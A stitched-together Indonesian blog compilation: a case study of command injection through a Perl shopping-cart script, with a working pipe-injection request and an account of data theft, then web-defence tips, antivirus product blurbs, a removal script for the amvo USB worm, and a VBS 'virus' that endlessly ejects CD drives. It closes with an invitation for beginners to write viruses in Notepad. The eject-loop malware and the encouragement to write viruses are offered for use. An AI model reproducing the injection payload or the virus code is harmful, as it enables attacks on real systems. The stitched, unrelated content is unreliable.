3.5. Eksekusi Perintah Jarak Jauh

Kenyataan bahwa satu file bisa dikopi dari satu lokasi ke lokasi dan bahwa log-log Web server dihapus mengisyaratkan bahwa hacker berhasil menjalankan perintah-perintah eksekusi pada www.acme-fashions.com dan memiliki akses ke sana setingkat ”super-user” atau ”administrator”. Setelah mengevaluasi secara menyeluruh keamanan sistem operasi dan mengunci semua prosedur, tim menyimpulkan bahwa kelemahannya hampir pasti terletak pada error di kode program aplikasi. Masalah tersebut kemudian bermuara pada cacatnya validasi input pada kode program troli belanjanya sendiri. Gambar 3.10. menunjukkan bagaimana troli belanja berinteraksi dengan beragam elemen dari aplikasi Web.

Troli belanja dikendalikan oleh script Perl pusat, yaitu mywebcart.cgi. Semua sesi client-side dilacak dan diatur oleh mywebcart.cgi. Troli belanja mengambil informasi produk dari database products.mdb dan membawanya ke modul terminal checkout yang menangani pembayaran pelanggan yang kemudian disimpan pada purchase.mdb.

Gambar 3.11. menunjukkan halaman yang dihasilkan oleh mywebcart.cgi. Pada gambar dapat kita lihat bagaimana URL dikomposisi.

URL tersebut adalah:

http://www.acme-fashions.com/cgi -

bin/ mywebcart.cgi?Cust=0873&nextpage=shirts3.html&cid=03417

Elemen yang paling menarik pada URL ini adalah parameter-parameter yang dilewatkan berikut nilai-nilainya. Pada parameter nextpage melewatkan nilai ”shirts3.html”. Pada kode program Perl mywebcart.cgi, baris berikut ini mempunyai kelemahan:

$file = ”c: \inetpub\wwwroot\catalog_templates\” . $input { ‘nextpage’};

open (FILE, $file) || die “Cannot open $file\n”;

File mywebchart.cgi terkunci. Parameter nextpage dilewatkan ke fungsi Perl open() tanpa ada satupun validasi input. Seorang penyerang bisa menyisipkan simbol pipa “|” di belakang nilai yang ditentukan pada nextpage dan menyebabkan fungi open() bisa mengeksekusi perintah-perintah yang merugikan.

Request berikut ini menyebabkan mywebcart.cgi mengeksekusi perintah “dir c:\” pada www.acme-fashions.com:

http://www.acme-fashions.com/cgi -

bin/mywebcart.cgi?cust=0873&nextpage=;dir+c:\|&cid=03417

Pada titik ini kita bisa beranggapan bahwa hacker harus telah menjalankan tampilan daftar direktori penuh dengan perintah ”dir c;\|s”. Dari hasil yang tampak, si hacker mengetahui bahwa ada file purchase.mdb pada direktori C:\ACMEDATA. Selanjutnya ia menyalin file tersebut ke c:\inetpub\wwwroot kemudian men-download-nya menggunakan alamat http://www.acme-fashions.com/purchase.mdb. Gambar 3.13. dan 3.14. menunjukkan bagaimana file itu disalin dan akhirnya di-download.

Demonstrasi oleh para ahli keamanan ini menunjukkan adanya pelanggaran keamanan yang serius pada mywebcart.cgi. Bahkan saat ini, banyak model troli belanja yang terkenal dan dipakai orang memiliki kelemahan-kelemahan seperti itu.

3.6. Posmortem dan Pencegahan Lebih Lanjut

Acme Fashions, Inc., menderita banyak kerugian uang dan waktu oleh karena tiga kesalahan selama satu rentang waktu. Semua kesalahan itu muncul karena cacatnya bentuk validasi input dan karena kurang terintegrasinya data yang diterima dari Web browser.

Pertama, kecacatan itu disebabkan oleh penggunaan field-field tersembunyi secara tidak benar. Informasi penting seperti ID produk dan harga dilewatkan melalui field tersembunyi dalam form HTML. Kita tahu bahwa sewaktu respon HTML dikirim melalui browser web, server itu kehilangan kendali atas data yang dikirim. HTTP bersifat statis, dan server tidak bisa menentukan apakah data yang dikembalikan masih utuh atau sudah rusak. Field tersembunyi bisa dimanipulir pada client side dan dikirimkan kembali ke Web server. Jika server tidak mempunyai cara validasi input yang ketat atas informasi dari field tersembunyi, klien bisa merusak data dan tidak terkendali lagi oleh sistem. Untuk memproteksi sistem dari serangan integritas data seperti ini, developer situs Web harus mencegah pelewatan informasi melalui field tersembunyi. Sebaliknya, informasi seperti ini seharusnya diletakkan pada database di server, dan informasi itu dapat diambil dari database jika diperlukan.

Kesalahan kedua adalah menggunakan script client-side untuk menjalankan validasi input. Para developer sering tergoda untuk menggunakan JavaScript atau VBScript dalam menulis program pengeksekusian pada client-side dan membuang batasan-batasan yang ada pada server. Tetapi, script client-side sama rentannya dengan field tersembunyi dalam hal daya tahan dari perusakan data. Script client-side seharusnya hanya digunakan untuk melancarkan navigasi atau menambahkan interaktifitas dan daya tarik halaman Web. Seorang penyerang bisa dengan mudah melewatkan atau memodifikasi script client-side dan menghindari setiap bentuk pemeriksaan yang dilakukan oleh script tersebut. Dalam kasus Acme, penyerang bisa menyisipkan nilai kuantitas negatif dengan mudahnya dan melewati setiap bentuk batasan yang dijalankan oleh oleh JavaScript. Sama dengan hal itu, beberapa toko berbasis Web menjalankan operasi aritmatik pada client-side, misalnya menghitung total kuantitas dan harga dari sebuah order dari dalam form isian itu sendiri. Bagi pelanggan sendiri akan menjadi fitur yang menarik bila mereka bisa mengetahui harga yang sudah di-update pada browser tanpa perlu men-submit nilai ke server dan menunggu respon darinya. Tetapi, teknik ini harus dihindari dan aplikasi harus didesain untuk mengeksekusi validasi dan perhitungan pada server side sehingga penyerang tidak bisa memanipulir data.

Kelemahan yang terakhir disebabkan oleh sanitasi input yang lemah pada mywebcart.cgi. Sewaktu data dilewatkan oleh field dalam bentuk HTML ke fungi-fungsi yang rentan seperti open(), buanglah setiap kombinasi atau meta-karakter. Dua bentuk validasi input yang harus dilaksanakan ditujukan kepada: pertama, panjang data yang diterima (untuk mencegah serangan buffer overflow) dan kedua, meta-karakter. Dalam hal ini, Acme harus menyisipkan sanitasi input untuk menapis meta-karakter seperti ”&”, ”%”, ”$”, ”|”, dan ”<”.

Masalah keamanan lainnya yang terkait dengan sistem belanja e-commerce, secara umum meliputi informasi yang dipanggil dari file temporer pada server, mekanisme enkripsi yang buruk, eksposur file system directory, eskalasi privilege, disklosur informasi pelanggan, perubahan produk, perubahan order, dan penolakan terhadap layanan. Semua hal tersebut memberikan celah bagi terjadinya serangan. Masalah ini ditemukan pada beberapa aplikasi e-commerce.

IV. Menangkis Serangan pada Web Application

Para hacker biasanya mencari sebuah target yang mudah untuk di-hack dalam waktu yang singkat. Berikut ini adalah beberapa teknik yang dapat digunakan untuk menangkis serangan pada Web application.

* Akses ke situs dengan memanfaatkan SSL.

Hanya dengan menggunakan secure socket layer (SSL), situs akan memblok simple CGI scanners, tool-tool raw-interface mode dan worm-worm internet. Memanfaatkan SSL dapat dengan mudah dilakukan dengan cara membuat suatu konfigurasi server yang hanya bekerja pada SSL (biasanya pada port 443) dan memblok trafik menuju por 80. Jika dibutuhkan sebuah entry page dalam HTTP, maka ini mungkin dapat menggunakan sebuah server kecil yang akan mengalihkan ke alamat HTTPS.

* Menggunakan metoda ”HTTP post” seluas mungkin.

Menggunakan ”HTTP post” request mengurangi kemudahan dari penggunaan tool-tool raw-mode interface dan browser-browser untuk menyerang sebuah situs. Penyerang menggunakan tool-tool raw-mode interface untuk digunakan secara manual meng-craft sebuah POST request, yang sedikit lebih susah daripada sebuah GET request sederhana, karena mereka harus menghitung exact body lenght untuk header dari mandatory content-length. Untuk memanipulasi beberapa parameter values dengan menggunakan browser, penyerang harus menyimpan HTML source ke disk, lalu memodifikasinya, dan kemudian me-reload-nya kembali ke browser.

* Memanfaatkan HTTP Authorization pada semua content dari situs.

Ini merupakan metoda sederhana yang akan bekerja dengan baik melawan worm-worm internet, simple CGI scanner, dan akan berdampak pada tool-tool raw-mode interface. Server benar-benar akan menolak beberapa request yang tidak otentik. Untuk mengizinkan user anonim untuk bekerja pada situs, mungkin dapat dilakukan dengan cara mengeluarkan halaman entry point dari skema ini dan menulis user name dan password pada situs yang lainnya. Dengan kata lain ini mempunyai efek pada tool-tool sederhana. Semua tool yang tidak didukung otentikasi tidak akan bekerja pada situs ini. Termasuk worm-worm internet dan simple CGI scanner. Penyerang akan membutuhkan suatu data otentikasi HTTP pada setiap usaha penyerangannya. Ketika menggunakan tool-tool URL interface-mode, penyerang harus men-set parameter-parameter otentikasi HTTP ke nilai yang harus digunakan pada situs.

* “Menendang” para klien keluar dari aplikasi ketika terjadi error.

User-user reguler biasanya tidak membuat banyak kesalahan, setidak-tidaknya pada sesi yang sama. Jika sebuah situs mempunyai sebuah konsep aplikasi, dan jika klien dibutuhkan untuk melewati beberapa step untuk memperoleh sebuah sesi, maka mungkin saja terjadi upaya untuk memperoleh sesi yang invalid atau tidak syah dan ini bisa dideteksi sebagai sebuah serangan. Penyerang akan melakukan beberapa percobaan untuk memperoleh sebuah sesi selama beberapa kali, ketika ini terjadi maka sistem akan bekerja dan akan secara otomatis menolaknya untuk memasuki sebuah aplikasi.



1) PCMAV


pcmav 192 build 3

  • PRODUKSI INDONESIA: Antivirus produksi nasional pertama di Indonesia yang berkualitas dalam mengatasi secara tuntas berbagai jenis gangguan virus komputer yang membandel dan dengan database virus terbanyak.
  • BERSIH TUNTAS: Dengan daya basmi PCMAV yang tangguh, virus yang membandel sekalipun dapat diburu sekaligus dibersihkan secara tuntas sampai ke “akar-akarnya” tanpa sisa.
  • PENYELAMATAN DOKUMEN: Folder maupun file dokumen penting Anda yang disembunyikan (hidden) maupun terinfeksi oleh virus dapat dipulihkan secara sempurna hingga 100% tanpa khawatir risiko kehilangan atau kerusakan pada file.
  • PEMULIHAN SISTEM: Settingan registry dan file sistem penting Windows yang telah “rusak”, baik oleh virus maupun akibat penggunaan antivirus lain yang kurang handal, mampu diperbaiki (repair) secara menyeluruh hingga pulih 100%.
  • AKURAT: Dengan formula khusus yang unik mampu menjadikan PCMAV sebagai salah satu antivirus terbaik di dunia dalam hal keakuratan pendeteksian, sehingga kesalahan dalam penyelamatan file dapat dihindari.
  • AKTIF MELINDUNGI: Dirancang secara pro-aktif untuk memastikan sebuah file yang dijalankan telah bebas virus dan akan menghadang virus sebelum menyebar, bahkan untuk virus baru yang belum dikenal. Jadi Anda pun bisa tenang, karena saat komputer Anda bekerja, PCMAV tak berhenti melindunginya.
  • UPDATE OTOMATIS: Kurang lebih 100 virus baru ditemukan di Indonesia setiap bulannya. Secara otomatis, dengan online update secara reguler, PCMAV akan melindungi komputer Anda dari ancaman virus terbaru.
  • PEMERIKSAAN MENYELURUH: Teknologi multi-point scanning di PCMAV efektif dalam menghindari lolosnya virus yang mampu otomatis aktif baik sebagai kode injeksi, process, services, sampai yang terjadwal sekalipun.
  • MENGENALI VIRUS BARU: Teknologi “GeneticHeuristic” yang unik secara efektif mampu mendeteksi virus baru yang belum dikenal, bahkan untuk virus script baru sekalipun yang sering lolos oleh antivirus lain.
  • PENDETEKSIAN TERCEPAT: Dengan algoritma spesial yang terdapat dalam kode komponen inti pendeteksiannya, PCMAV mampu menghasilkan performa tercepat dibanding antivirus lain yang pernah diproduksi di Indonesia.
  • DUAL-CORE ENGINE ANTIVIRUS: Engine PCMAV dapat dikombinasikan dengan engine ClamAV yang telah disempurnakan oleh tim PCMAV untuk mendapatkan hasil pendeteksian dan perlindungan virus yang lebih banyak, bahkan hingga 400.000 virus/malware lebih.
2)SMADAV

smadav-2009

Smadav 2009 sudah menemukan kekuatan baru, Smadav 2009 Rev. 3 sudah disempurnakan dengan seluruh fitur yang cukup untuk menggantikan antivirus impor, dengan fitur:

* SmaRT-Protection jauh lebih hebat daripada Rev. 2
* SmaRT-Protection untuk deteksi otomatis Flashdisk, mencegah SEMUA virus lokal & bahkan impor
* SmaRT-Protection sudah support penuh untuk Vista
* Pembersihan Registry sudah support untuk Vista
* Pembersihan total virus-virus lokal baru, khususnya Harry Potter, Virus Shortcut, Yuyun.VBS.
* Penambahan banyak database virus lokal baru dan perbaikan sistem penghitungan database virus.
* dan banyak perbaikan lainnya…

SmaRT-Protection dapat digabungkan dengan proteksi semua produk antivirus manapun. Walaupun Smadav 2009 Rev. 3 sendiri sudah cukup untuk mencegah SEMUA virus lokal & bahkan impor.

3)MORPHOST green

image001

Satu hal yang paling bisa dibanggakan adalah tehnik Morphost sendiri. Dan aku sendiri menjamin keampuhan Morphost kali ini meningkat 80% dari Morphost Revision!.
Aku menyusun ulang heuristiknya. Secara garis besar Heuristik Morphost terbagi 2, yaitu: Fixed Heuristic dan Portable Heuristic

Fixed Heuristic ada 7, diantaranya
1 Read String , gunanya untuk membaca string-string sensitif pada file (aku yakin kebanyakan AV sudah pake heuristik ini)
2. X-Method, gunanya dirahasiakan.
3. Y-Method, gunanya dirahasiakan
4. Z-Method, gunanya dirahasiakan
5. ScanningIcon, gunanya untuk menscan ceksum icon pada file.
6. GetVirusTrap-A, gunanya dirahasiakan
7. GetVirusTrap-B, gunanya dirahasiakan

Kegunaan heuristik diatas sebagian dirahasiakan karena heuristik tersebut adalah heuristik yang sangat gampang. Mungkin AVMaker lain belum menyadarinya…

Portable Heuristic ada satu dan heuristik yang ini tidak akan dibicarakan disini. Heuristik ini dibawa oleh program Pro-Morphost (terpisah dengan Morphost Antivirus). Selain itu Morphost Green juga dilengkapi fitur baru yang kuberi nama “Force Terminate”. Dari namanya saja udah kelihatan kalo fitur ini fungsinya untuk menterminate program (secara paksa). Tapi aku anjurkan kalian menggunakan fitur ini dengan berhati-hati.

image002

4)ANSAV

Ansav adalah salah satu Antivirus terbaik buatan dalam negeri yang dapat menangani virus baik lokal maupun luar.

Ansav memiliki keunggulan daripada Antivirus yang lain adalah Ansav memiliki plugin-plugin tambahan yang memiliki banyak fungsi, sebagai contoh adalah SOR (SimpleOfficeRecover), plugin ini berfungsi untuk memperbaiki file office yang terserang virus dengan metode prepending. Tapi kekurangan plugin ini masih banyak ditemukan bugs-bugs karena si pembuat mengaku masih dalam taraf percobaan. Dan masih banyak plugin-plugin yang menarik lainnya.

Ansav dapat digunanakan dengan 2 cara yaitu portable dan juga dapat diinstal dikomputer.

5)AVIGEN

AVIGEN V 2

Nggak tau juga apa latah pakai nama avi. AVIGen adalah software antivirus yang digunakan untuk mencari file-file yang berisi worm, hacktool, exploit script ataupun trojan. Pada versi kedua ini AVIGen hanya difokuskan untuk mencari virus-virus lokal yang saat ini banyak menginfeksi beberapa komputer di indonesia, seperti brontok, pendekar blank, fluikan dan lain-lain.Meski barangkali pengenalan virusnya terkesan basi, tetapi antivirus ini punya fasilitas pendukung untuk menghancurkan kegiatan-kegiatan virus seperti registri tweak, Scan Running Process, Scan AutoRun Locations, Process Viewer dan penambahan kategorisasi virus yang bisa dilakukan oleh pengguna.

6)KAV


Kendal AV adalah salah satu AV local yang di program dan dikembangkan oleh pelajar-pelajar dari Kendal. Kendal Av ini sendiri merupakan antivirus yang tergolong masih Newbies dan kurang berpengalaman. Tapi bukanya KAV 2008 ( Kendal AV 2008 ) tidak bis berbuat apa-apa. Banyak sekali keunikan feature dan teknik yang ada pada Kendal AV sehingga memaximalkan performa KAV sendiri. Bahkan sebagian teknik dan feature jarang sekali dijumpai ( saya belum pernah menjumpai ) di AV Lokal lainya. 1 feature andalan KAV yang menjadikan KAV mampu diUpgrade oleh User tanpa harus mendownload KAv versi terbaru (jika ada) dengan membuat data base sendiri. Karena tool User Database memungkinkan KAV dapat membereskan hamper seluruh virus terkecuali Virus yang menggunakan teknik khusus, tentunya dengan bantuan User KAV sendiri. Pada dasarnya sebagian teknik yang digunakan KAV untuk mencari targetnya hasil karya programmer KAV sendiri antara lain L43 pattern (ceksum utama KAV ) ,PCS ( Code special untuk menangani Virus berteknik Stealth/Polymorpich ). Sehingga saya menyadari banyak sekali kekurangan dan kelemahan KAV 2008. Walaupun kekurangan itu diluar control dan kendali saya, saya selalu mencoba untuk memperbaiki kekurangan-kekurangan itu selama masih ada kesempatan dan kekuatan. Disamping itu saya juga sadar tanpa adanya dukungan dana dan kemampuan yang yang cukup saya hanya bias berharap KAV bias terus kami ( team KAV ) kembangkan demi kemajuan IT di kab.Kendal khususnya. Demikianlah gambaran singkat tentang KAV 2008 yang merupakan AV tak berbayar dan tanpa jaminan Apapun.

Berikut merupakan KAV User setting, dimana User dapat mengatur Setting dari aplikasi AV sendiri sesuka User. Dengan settingan User sendirilah juga meentukan kemampuan dan Performa Scanning KAV out sendiri.

- Enable Filter Scan

Jika User memberikan tanda centang pada feature/opsi ini, maka File target Scanning dari KAV akan dipilih berdasarkan ukuran file. Sehingga ukuran file yang tidak memungkinkan irus akan dilewati / by passing oleh ceksum L43 sehingga sedikit menambah kecepatan KAV. Walupun sedikit menambah saran saya pakailah feature ini jika melakukan scanning.

- Enable L43 Pattern

Feature ini sangat penting untuk dipakai, karena dengan feature inilah KAV mengenali Virus di Internal DataBase + User Data base ( jika ada )

- Use KAV Heuristic

Feature ini memungkinkan KAv untuk menngenali MalScript yang ada di Komputer anda, tapi teknik Heuristic masih sederhana sehingga harus masih banyak untuk diperbaiki. Tapi teknik selection pada Heuristic KAV memungkinkan terjadinya hanya sedikit kesalahan. Tapi sejauh ini kesalahan itu belum saya dapati.

- Fix infected Doc’xls’exe

Menurut programmer feature ini sangat penting untuk anda, walaupun dengan feature ini kerja KAV agak sedikit lambat saat scanning. Tapi didalam feature inilah teknik PCS dikemas. Dengan teknik inilah kAV mampu mencari virus berteknik kusus yang bias menyusup dalam aplikasi. Smentara virus berteknik kusus yang bias ditangani Code tersebut dalah vbalman. Virus tersebut memang meresahkan masyarkat, karena kebanyakan AV local dapat dilaluinya. Sejauh ini pengujian Code PCS selalu berhasil mendeteksi VBalaman. Hasilnya juga saya cocokan berkali-kali dengan AVG. KAV + AVG sama hasilnya dalam pendeteksian Virus tersebut.

- Fix Lokal registry

Feature ini sebenarnya G’ penting, tapi bagi user awam penting juga she. Feature ini hanya berguna untuk mengembalikan nilai Registry Default yang dikotori virus. Ingat kemungkinan besar feture ini tidk sesuai dengan anda,, karena feature tersebut saya pernah mendapat saran. Sehingga rencana saya kalau masih memungkinkan untuk membuat KAV Hr-1 feature tersebut akan diganti dengan REG tool saja.

- Normalize Sys + Hide File

Feature tersebut berfungsi untuk mengembalikan attribute dari file / folder yang sebagian besar di Hidden oleh virus. Sehingga kadang-kadang user mers telah kehilangan data-datanya.

- Run On Start Up

Memungkinkan KAv berjalan di Start Up ( mungkin feature ini masih bermasalah )

- Enable Process Wather

Feature ini juga sangat penting menurut saya, karena dengan feature ini KAv akan memantau process di memory dan mencocokan dengan Data base internal dan User DataBase ( jika feature digunakan ) dan akan menterminate jika cocok dengan DataBase.

- Adding Your Database

Feature ini untuk menambahkan ceksum yang tersimpan pada User DataBaSE


cd rom virus vbs

set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()

virus mata_virus_amvo_usb.vbs

On Error Resume Next

Dim geekside,nret,nret1,nret2,nret3,nret4,nret5,nret6,nret7,nret8,nret9,nret10,nret11,nret12,nret13,nret14,WSHShell,nret15
Dim nret16,nret17,nret18,nret19,nret20,nret21,nret22,nret23,nret24,nret25,nret26,nret27,nret28,nret29,nret30,nret31,nret32
Dim nret33,nret34,nret35,nret36,nret37,nret38,nret39,nret40,nret41,nret42,nret43,nret44,nret45,nret46,nret47,nret48, nret49, nret50
Dim nret51, nret52,nret53,nret54,nret55,nret56,nret57,nret58, nret59, nret60,nret61,nret62,nret63
Dim nret64,nret65,nret66,nret67,nret68,nret69,nret70,nret71,nret72,nret73,nret74,nret75,nret76,nret77



Set geekside=WScript.CreateObject("WScript.Shell")
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set colDrives = objFSO.Drives

Wscript.Echo "Software provisto por MyGeekSide.com para la eliminaciĆ³n del software malicioso amvo, avpo, n1detect"

For Each objDrive in colDrives
If objDrive.IsReady = True Then
Wscript.Echo "Limpiar unidad: " & objDrive.DriveLetter


nret13=geekside.Run("cmd /C taskkill /f /im amvo.exe",0,TRUE)
nret14=geekside.Run("cmd /C taskkill /f /im avpo.exe",0,TRUE)

nret55=geekside.Run("cmd /C taskkill /f /im semo2x.exe.tmp",0,TRUE)
nret58=geekside.Run("cmd /C taskkill /f /im semo2x.exe",0,TRUE)


nret=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\autorun.inf",0,TRUE)
nret1=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\ntdeiect.com",0,TRUE)
nret2=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\n1detect.com",0,TRUE)
nret3=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\n1deiect.com",0,TRUE)
nret4=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\n?deiect.com",0,TRUE)
nret5=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\nide?ect.com",0,TRUE)
nret6=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\u?de?ect.com",0,TRUE)
nret3=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\ntde1ect.com",0,TRUE)


nret51=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\80*.com",0,TRUE)
nret52=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\semo*.exe",0,TRUE)


nret64=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\dos*.com",0,TRUE)
nret65=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\xfool*.com",0,TRUE)
nret65=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\d.com",0,TRUE)

nret65=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\tio*.*",0,TRUE)


nret7=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\autorun.inf /f /q /a",0,TRUE)
nret8=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\ntdeiect.com /f /q /a" ,0,TRUE)
nret9=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\n1detect.com /f /q /a",0,TRUE)
nret10=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\n?deiect.com /f /q /a",0,TRUE)
nret11=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\nide?ect.com /f /q /a",0,TRUE)
nret12=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\u?de?ect.com /f /q /a",0,TRUE)


nret53=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\80*.com /f /q /a",0,TRUE)
nret54=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\semo*.exe /f /q /a",0,TRUE)


nret66=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\dos*.com /f /q /a",0,TRUE)
nret67=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\xfool*.com /f /q /a",0,TRUE)
nret67=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\d.com /f /q /a",0,TRUE)
nret67=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\ntde1ect.com /f /q /a",0,TRUE)


nret67=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\tio*.* /f /q /a",0,TRUE)


nret15=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\amvo.exe",0,TRUE)
nret16=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\avpo.exe",0,TRUE)
nret17=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\amvo0.dll",0,TRUE)
nret18=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\amvo1.dll",0,TRUE)
nret41=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\amvo2.dll",0,TRUE)
nret19=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\avpo0.dll",0,TRUE)
nret20=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\avpo1.dll",0,TRUE)


nret56=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\semo*.exe.tmp",0,TRUE)
nret60=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\semo*.exe",0,TRUE)


nret23=geekside.Run("cmd /C del /f c:\windows\system32\amvo.exe",0,TRUE)
nret24=geekside.Run("cmd /C del /f c:\windows\system32\avpo.exe",0,TRUE)
nret25=geekside.Run("cmd /C del /f c:\windows\system32\amvo0.dll",0,TRUE)
nret26=geekside.Run("cmd /C del /f c:\windows\system32\amvo1.dll",0,TRUE)
nret42=geekside.Run("cmd /C del /f c:\windows\system32\amvo2.dll",0,TRUE)
nret27=geekside.Run("cmd /C del /f c:\windows\system32\avpo0.dll",0,TRUE)
nret28=geekside.Run("cmd /C del /f c:\windows\system32\avpo1.dll",0,TRUE)


nret57=geekside.Run("cmd /C del /f c:\windows\system32\semo*.exe.tmp",0,TRUE)
nret59=geekside.Run("cmd /C del /f c:\windows\system32\semo*.exe",0,TRUE)


nret31=geekside.Run("cmd /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v amva /f",0,TRUE)
nret32=geekside.Run("cmd /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v avpo /f",0,TRUE)

nret68=geekside.Run("cmd /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v avpa /f",0,TRUE)


nret33=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f",0,TRUE)
nret43=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v SuperHidden /t REG_DWORD /d 1 /f",0,TRUE)
nret44=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v ShowSuperHidden /t REG_DWORD /d 1 /f",0,TRUE)


nret45=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f",0,TRUE)
nret46=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v SuperHidden /t REG_DWORD /d 1 /f",0,TRUE)
nret47=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v ShowSuperHidden /t REG_DWORD /d 1 /f",0,TRUE)


nret34=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\ /v CheckedValue /t REG_DWORD /d 2 /f",0,TRUE)
nret35=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\ /v DefaultValue /t REG_DWORD /d 2 /f",0,TRUE)


nret36=geekside.Run("cmd /C reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v CheckedValue /f",0,TRUE)
nret37=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v CheckedValue /t REG_DWORD /d 1 /f",0,TRUE)
nret38=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v DefaultValue /t REG_DWORD /d 2 /f",0,TRUE)


nret39=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\ /v CheckedValue /t REG_DWORD /d 0 /f",0,TRUE)
nret40=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\ /v DefaultValue /t REG_DWORD /d 0 /f",0,TRUE)

nret48=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ /v Type /t REG_SZ /d Group /f",0,TRUE)


nret49=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f",0,TRUE)
nret50=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f",0,TRUE)


End If
Next

nret61=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoFolderOptions /t REG_DWORD /d 0 /f",0,TRUE)
nret62=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoFolderOptions /t REG_DWORD /d 0 /f",0,TRUE)
nret63=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableRegistryTools /t REG_DWORD /d 0 /f",0,TRUE)


Wscript.Echo "Debes reiniciar tu PC para asegurarnos de haber eliminado el software malicioso"

membuat virus sederhana dengan notepad windows

siapa bilang membuat virus itu susah?
siapa bilang membuat virus harus menggunakan program khusus?
bagi para pemula jangan khawatir sekarang banyak virus yang dibuat dengan sederhana hanya bermodalkan notepad windows .dari sini kita dapat membuat virus sederhana yang mungkin saja engga kalah dengan virus yang dibuat dari program khusus seperti vb06,assembly,c++,broland delphi dan masih banyak lagi.....
